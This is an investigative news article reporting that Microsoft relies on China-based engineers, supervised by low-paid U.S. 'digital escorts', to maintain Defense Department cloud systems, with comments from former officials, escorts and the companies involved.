by Renee Dudley, with research by Doris Burke ProPublica is a nonprofit newsroom that investigates abuses of power. Sign up to receive our biggest stories as soon as theyre published. Microsoft is using engineers in China to help maintain the Defense Departments computer systems with minimal supervision by U.S. personnel leaving some of the nations most sensitive data vulnerable to hacking from its leading cyber adversary, a ProPublica investigation has found.The arrangement, which was critical to Microsoft winning the federal governments cloud computing business a decade ago, relies on U.S. citizens with security clearances to oversee the work and serve as a barrier against espionage and sabotage. But these workers, known as digital escorts, often lack the technical expertise to police foreign engineers with far more advanced skills, ProPublica found. Some are former military personnel with little coding experience who are paid barely more than minimum wage for the work.Were trusting that what theyre doing isnt malicious, but we really cant tell, said one current escort who agreed to speak on condition of anonymity, fearing professional repercussions. The system has been in place for nearly a decade, though its existence is being reported publicly here for the first time.Microsoft told ProPublica that it has disclosed details about the escort model to the federal government. But former government officials said in interviews that they had never heard of digital escorts. The program appears to be so low-profile that even the Defense Departments IT agency had difficulty finding someone familiar with it. Literally no one seems to know anything about this, so I dont know where to go from here, said Deven King, spokesperson for the Defense Information Systems Agency. National security and cybersecurity experts contacted by ProPublica were also surprised to learn that such an arrangement was in place, especially at a time when the U.S. intelligence community and leading members of Congress and the Trump administration view Chinas digital prowess as a top threat to the country.The Office of the Director of National Intelligence has called China the most active and persistent cyber threat to U.S. Government, private-sector, and critical infrastructure networks. One of the most prominent examples of that threat came in 2023, when Chinese hackers infiltrated the cloud-based mailboxes of senior U.S. government officials, stealing data and emails from the commerce secretary, the U.S. ambassador to China and others working on national security matters. The intruders downloaded about 60,000 emails from the State Department alone.With President Donald Trump and his allies concerned about spying, the State Department announced plans in May to aggressively revoke visas for Chinese students a pledge that the president seems to have walked back. The administration is also trying to arrange the sale of the popular social media platform TikTok, which is owned by a Chinese company that some lawmakers believe could hand over sensitive U.S. user data to Beijing and fuel misinformation with its content recommendations. But experts told ProPublica that digital escorting poses a far greater threat to national security than either of those issues and is a natural opportunity for spies.If I were an operative, I would look at that as an avenue for extremely valuable access. We need to be very concerned about that, said Harry Coker, who was a senior executive at the CIA and the National Security Agency. Coker, who also was national cyber director during the Biden administration, added that he and his former intelligence community colleagues would love to have had access like that.It is difficult to know whether engineers overseen by digital escorts have ever carried out a cyberattack against the U.S. government. But Coker wondered whether it could be part of an explanation for a lot of the challenges we have faced over the years.Microsoft uses the escort system to handle the governments most sensitive information that falls below classified. According to the government, this high impact level category includes data that involves the protection of life and financial ruin. The loss of confidentiality, integrity, or availability of this information could be expected to have a severe or catastrophic adverse effect on operations, assets and individuals, the government has said. In the Defense Department, the data is categorized as Impact Level 4 and 5 and includes materials that directly support military operations. John Sherman, who was chief information officer for the Department of Defense during the Biden administration, said he was surprised and concerned to learn of ProPublicas findings. I probably should have known about this, he said. He told the news organization that the situation warrants a thorough review by DISA, Cyber Command and other stakeholders that are involved in this.In an emailed statement, the Defense Information Systems Agency said that cloud service providers are required to establish and maintain controls for vetting and using qualified specialists, but the agency did not respond to ProPublicas questions regarding the digital escorts qualifications.Its unclear whether other cloud providers to the federal government use digital escorts as part of their tech support. Amazon Web Services and Google Cloud declined to comment on the record for this article. Oracle did not respond to requests for comment.Microsoft declined to make executives available for interviews for this article. In response to emailed questions, the company provided a statement saying its personnel and contractors operate in a manner consistent with US Government requirements and processes.Global workers have no direct access to customer data or customer systems, the statement said. Escorts with the appropriate clearances and training provide direct support. These personnel are provided specific training on protecting sensitive data, preventing harm, and use of the specific commands/controls within the environment. In addition, Microsoft said it has an internal review process known as Lockbox to make sure the request is deemed safe or has any cause for concern. A company spokesperson declined to provide specifics about how it works but said its built into the system and involves review by a Microsoft employee in the U.S. Over the years, various people involved in the work, including a Microsoft cybersecurity leader, warned the company that the arrangement is inherently risky, those people told ProPublica. Despite the presence of an escort, foreign engineers are privy to granular details about the federal cloud the kind of information hackers could exploit. Moreover, the U.S. escorts overseeing these workers are ill equipped to spot suspicious activity, two of the people said.Even those who helped develop the escort system acknowledge the people doing the work may not be able to detect problems.If someone ran a script called fix_servers.sh but it actually did something malicious then [escorts] would have no idea, Matthew Erickson, a former Microsoft engineer who worked on the escort system, told ProPublica in an email. That said, he maintained that the scope of systems they could disrupt is limited. The Defense Department requires anyone working with its most sensitive data to be a U.S. citizen, U.S. national or permanent resident. No Foreign persons may have such access, according to the departments cloud security requirements. Microsoft, however, has a global workforce, so it created the digital escort system as a work-around. Heres an example of how it works and the risk it poses:Tech support is needed on a Microsoft cloud product. A Microsoft engineer in China files an online ticket to take on the work. A U.S.-based escort picks up the ticket.The engineer and the escort meet on the Microsoft Teams conferencing platform.The engineer sends computer commands to the U.S. escort, presenting an opportunity to insert malicious code.The escort, who may not have advanced technical expertise, inputs the commands into the federal cloud system.Illustrations for ProPublica A Microsoft contractor called Insight Global posted an ad in January seeking an escort to bring engineers without security clearances into the secured environment of the federal government and to protect confidential and secure information from spillage, an industry term for a data leak. The pay started at $18 an hour.While the ad said that specific technical skills were highly preferred and nice to have, the main prerequisite was possessing a valid secret level clearance issued by the Defense Department.People are getting these jobs because they are cleared, not because theyre software engineers, said the escort who agreed to speak anonymously and who works for Insight Global.Each month, the companys roughly 50-person escort team fields hundreds of interactions with Microsofts China-based engineers and developers, inputting those workers commands into federal networks, the employee said. In a statement to ProPublica, Insight Global said it evaluates the technical capabilities of each resource throughout the interview process to ensure they possess the technical skills required for the job, and provides training. The company noted that escorts also receive additional cyber and insider threat awareness training as part of the government security clearance process.While a security clearance may be required for the role, it is but one piece of the puzzle, the company said. Microsoft did not respond to questions about Insight Global.The Path of Least ResistanceWhen modern cloud technology emerged in the 2000s, offering on-demand computing power and data storage via the internet, it ushered in fundamental changes to federal government operations. For decades, federal departments used computer servers owned and operated by the government itself to house data and power networks. Shifting to the cloud meant moving that work to massive off-site data centers managed by tech companies. Federal officials believed that the cloud would provide greater power, efficiency and cost savings. But the transition also meant that the government would cede some control over who maintained and accessed its information to companies like Microsoft, whose employees would take over tasks previously handled by federal IT workers. To address the risks of this revolution, the government started the Federal Risk and Authorization Management Program, known as FedRAMP, in 2011. Under the program, companies that wanted to sell their cloud services to the government had to establish how they would ensure that personnel working with sensitive federal data would have the requisite access authorizations and background screenings. On top of that, the Defense Department had its own cloud guidelines, requiring that people handling sensitive data be U.S. citizens or permanent residents. This presented an issue for Microsoft, given its reliance on a vast global workforce, with significant operations in India, China and the European Union. So the company tapped a senior program manager named Indy Crowley to put federal officials at ease. Known for his familiarity with the rules and his ability to converse in the governments acronym-heavy lingo, colleagues dubbed him the FedRAMP whisperer.In an interview, Crowley told ProPublica that he appealed directly to FedRAMP leadership, arguing that the relative risk from Microsofts global workforce was minimal. To make his point, he said he once grilled a FedRAMP official on the provenance of code in products supplied by other government vendors such as IBM. The official couldnt say with certainty that only U.S. citizens had worked on the product in question, he said. The cloud, Crowley argued, should not be treated any differently.Crowley said he also met with prospective customers across the government and told ProPublica that the Defense Department was the one making the most demands. Concerned about the companys global workforce, officials there asked him who from Microsoft would be behind the curtain working on the cloud. Given the departments citizenship requirements, the officials raised the possibility of Microsoft hiring a bunch of U.S. citizens to maintain the federal cloud directly, Crowley told ProPublica. For Microsoft, the suggestion was a nonstarter, Crowley said, because the increased labor costs of implementing it broadly would make a cloud transition prohibitively expensive for the government.Its always a balance between cost and level of effort and expertise, he told ProPublica. So you find whats good enough. Hiring virtual escorts to supervise Microsofts foreign workforce emerged as the path of least resistance, Crowley said.Microsoft did not respond to ProPublicas questions about Crowleys account.When he brought the concept back to Microsoft, colleagues had mixed reactions. Tom Keane, then the corporate vice president for Microsofts cloud platform, Azure, embraced the idea, according to a former employee involved in the discussions, as it would allow the company to scale up. But that former employee, who was involved in cybersecurity strategy, told ProPublica they opposed the concept, viewing it as too risky from a security perspective. Both Keane and Crowley dismissed the concerns, said the former employee, who left the company before the escort concept was deployed.People who got in the way of scaling up did not stay, the former employee told ProPublica.Crowley said he did not recall the discussion. Keane did not respond to requests for comment.On its march to becoming one of the worlds most valuable companies, Microsoft has repeatedly prioritized corporate profit over customer security, ProPublica has found. Last year, the news organization reported that the tech giant ignored one of its own engineers when he repeatedly warned that a product flaw left the U.S. government exposed; state-sponsored Russian hackers later exploited that weakness in one of the largest cyberattacks in history. Microsoft has defended its decision not to address the flaw, saying that it received multiple reviews and that the company weighs a variety of factors when making security decisions.A Skills Gap From the StartThe idea of an escort wasnt novel. The National Institute of Standards and Technology, which serves as the federal governments standards-setting body, had established recommendations on how IT maintenance should be performed on-site, such as in a restricted government office. Maintenance personnel that lack appropriate security clearances or are not U.S. citizens must be escorted and supervised by approved organizational personnel who are fully cleared, have appropriate access authorizations, and are technically qualified, the guidelines state.The government at the time specified the intent of the recommendation: to deny individuals who lack appropriate security clearances ... or who are not U.S. citizens, visual and electronic access to sensitive government information.But escorts in the cloud wouldnt necessarily be able to meet that goal, given the gap in technical expertise between them and the Microsoft counterparts they would be taking direction from.That imbalance, though, was baked into the escorting model.Erickson, the former Microsoft engineer who worked on the model, told ProPublica that escorts are somewhat technically proficient, but mainly are just there to make sure the employees dont accidentally or intentionally view passwords, customer data or personally identifiable information. If there are problems with the underlying cloud services, then only the people who work on those services at Microsoft would have the requisite knowledge to fix it, he said.Advanced threats from foreign adversaries werent on the radar for Erickson, who said he didnt have any reason to suspect someone more just based on their country of origin.I dont think there is any extra threat from Microsoft employees based in other countries, he said. (Illustration by Andrea Wise/ProPublica. Source images: Bevan Goldswain/Getty Images, kontekbrothers/Getty Images, amgun/Getty Images.) Pradeep Nair, a former Microsoft vice president who said he helped develop the concept from the start, said that the digital escort strategy allowed the company to go to market faster, positioning it to win major federal cloud contracts. He said that escorts complete role-specific training before touching any production system and that a variety of safeguards including audit logs, the digital trail of system activity, could alert Microsoft or the government to potential problems. Because these controls are stringent, residual risk is minimal, Nair said.But legal and cybersecurity experts say such assumptions ignored the massive cyber threat from China in particular. Around the time that Microsoft was developing its escort strategy, an attack attributed to Chinese state-sponsored hackers resulted in the largest breach of U.S. government data up to that point. The theft initially targeted a government contractor and eventually compromised the personal information of more than 22 million people, most of them applicants for federal security clearances.Chinese laws allow government officials there to collect data as long as theyre doing something that theyve deemed legitimate, said Jeremy Daum, senior research fellow at the Paul Tsai China Center at Yale Law School. Microsofts China-based tech support for the U.S. government presents an opening for espionage, whether it be putting someone whos already an intelligence professional into one of those jobs, or going to the people who are in the jobs and pumping them for information, Daum said. It would be difficult for any Chinese citizen or company to meaningfully resist a direct request from security forces or law enforcement.Erickson acknowledged that having an escort doesnt prevent foreign developers from doing bad things. It just allows for there to be a recording and a witness. He said if an escort suspects malicious activity, they will end the session and file an incident report to investigate further.How much of this information federal officials understood is unclear.A Microsoft spokesperson said the company described the digital escort model in the documents submitted to the government as part of cloud vendor authorization processes. However, it declined to provide those records or to tell ProPublica the exact language it used in them to describe the escort arrangement, citing the potential security risk of publicly disclosing it.In addition to a third-party auditor, Microsofts documentation theoretically would have been reviewed by multiple parties in the government, including FedRAMP and DISA. DISA said the materials are not releasable to the public. The General Services Administration, which houses FedRAMP, did not respond to requests for comment.The Right Eyes for the Job?In June 2016, Microsoft announced that it had received FedRAMP authorization to work with some of the governments most sensitive data. Matt Goodrich, then FedRAMP director, said at the time that the accreditation was a testament to Microsofts ability to meet the governments rigorous security requirements.Around the same time, Microsoft put the escort concept into practice, engaging contacts from defense giant Lockheed Martin to hire cloud escorts, two people involved in the contract told ProPublica.A project manager, who asked for anonymity to describe confidential discussions, told ProPublica that they were skeptical of the escort arrangement from the start and voiced those feelings to their Microsoft counterpart. The manager was especially concerned that the new hires would not have the right eyes for the job given the relatively low pay set by Microsoft, but the system went ahead anyway.Lockheed Martin referred questions to Leidos, a company that took over Lockheeds IT business following a merger in 2016. Leidos declined to comment.As Microsoft captured more of the governments business, the company turned to additional subcontractors, typically staffing companies, to hire more digital escorts. Analyzing profiles on LinkedIn, ProPublica identified at least two such firms: Insight Global and ASM Research, whose parent company is consulting giant Accenture. While the scope of each firms business with Microsoft is unclear, ProPublica found more workers identifying themselves as digital escorts at Insight Global, many of them former military personnel, than at ASM. ASM and Accenture did not respond to requests for commentConcerns About ChinaSome Insight Global workers recognized the same problem as the former Lockheed manager: a mismatch in skills between the U.S.-based escorts and the Microsoft engineers they are supervising. The engineers might briefly describe the job to be completed for instance, updating a firewall, installing an update to fix a bug or reviewing logs to troubleshoot a problem. Then, with limited inspection, the escort copies and pastes the engineers commands into the federal cloud.Theyre telling nontechnical people very technical directions, the current Insight Global escort said, adding that the arrangement presents untold opportunities for hacking. As an example, they said the engineer could install an update allowing an outsider to access the network.Will that get caught? Absolutely, the escort told ProPublica. Will that get caught before damage is done? No idea.The escort was particularly concerned about the dozens of tickets a week filed by workers based in China. The attack targeting federal officials in 2023 in which Chinese hackers stole 60,000 emails underscored that fear.The federal Cyber Safety Review Board, which investigated the attack, blamed Microsoft for security lapses that gave hackers their opening. Its published report did not mention digital escorts, either as playing a role in the attack or as a risk to be mitigated. Sherman, the former chief information officer for the Defense Department, and Coker, the former intelligence official, who both also served as members of the CSRB, told ProPublica that they did not recall the board ever discussing digital escorting, which they said they now consider a major threat. The Trump administration has since disbanded the CSRB.In its statement, Microsoft said it expects escorts to perform a variety of technical tasks, which are outlined in its contracts with vendors. Insight Global said it evaluates prospective hires to ensure they have those skills and trains new employees on all applicable security and compliance policies provided by Microsoft.But the Insight Global employee told ProPublica the training regimen doesnt come close to bridging the knowledge gap. In addition, it is challenging for escorts to gain expertise on the job because the type of work they oversee varies widely. Its not possible to get as trained up as you need to be on the wide array of things you need to look at, they said. The escort said they repeatedly raised concerns about the knowledge gap to Microsoft, over several years and as recently as April, and to Insight Globals own attorneys. They said the digital escorts relative inexperience combined with Chinese laws that grant the countrys officials broad authority to collect data left U.S. government networks overly exposed. Microsoft repeatedly thanked the escort for raising the issues while Insight Global said it would take them under advisement, the escort said. It is unclear whether Microsoft or Insight Global took any steps to address them; neither company answered questions about the escorts account.In its statement, Microsoft said it meets regularly with its contractors to discuss operations and surface questions or concerns. The company also noted that it has additional layers of security and monitoring controls including automated code reviews to quickly detect and prevent the introduction of vulnerabilities.Microsoft assumes anyone that has access to production systems, regardless of location or role, can pose a risk to the system, whether intentionally or unintentionally, the company said in its statement.Another Warning, a Growing RiskLast year, about three months after government investigators released their report on the 2023 hack into U.S. officials emails, a former Insight Global contractor named Tom Schiller contacted a Defense Department hotline and wrote to several federal lawmakers to warn them about digital escorting. He had become familiar with the system while briefly working for the company as a software developer. By last July, Schillers complaints wound their way to the Defense Information Systems Agency Office of the Inspector General. Schiller told ProPublica that the office conducted a sworn interview with him, and separately with three others connected to Insight Global. In August, the inspector general wrote to Schiller to say it had closed the case.We conducted a preliminary analysis into the complaint and determined this matter is not within the avenue of redress by DISA IG and is best addressed by the appropriate DISA management, the assistant inspector general for investigations said in the letter. We have referred the information you provided to management.A spokesperson for the inspector general whose office is supposed to operate independently in order to investigate potential waste, fraud and abuse told ProPublica they were not authorized to speak about the issue and directed questions to DISA public affairs.If the public information office contacts me and wants to collaborate to formulate a response through their office, Ill be more than happy to do that, the spokesperson said. But I will not be responding to any kind of media request concerning OIG business without speaking with the public information office.DISA public affairs did not answer questions about the matter. After a spokesperson initially said that he couldnt find anyone who had heard of the escort concept, the agency later acknowledged in a statement to ProPublica that escorts are used in select unclassified environments at the Defense Department for advanced problem diagnosis and resolution from industry subject matter experts. Echoing Microsofts statement, it continued, Experts under escort supervision have no direct, hands-on access to government systems; but rather offer guidance and recommendations to authorized administrators who perform tasks.It is unclear what, if any, discussions have taken place among Microsoft, Insight Global and DISA, or any other government agency, regarding digital escorts.But David Mihelcic, DISAs former chief technology officer, said any visibility into the Defense Departments network poses a huge risk.Here you have one person you really dont trust because theyre probably in the Chinese intelligence service, and the other person is not really capable, he said.The risk may be getting more serious by the day, as U.S.-China relations worsen amid a simmering trade war the type of conflict that experts say could result in Chinese cyber retaliation.In testimony to a Senate committee in May, Microsoft President Brad Smith said the company is continually pushing Chinese out of agencies. He did not elaborate on how they got in, and Microsoft did not respond to follow-up questions on the remark.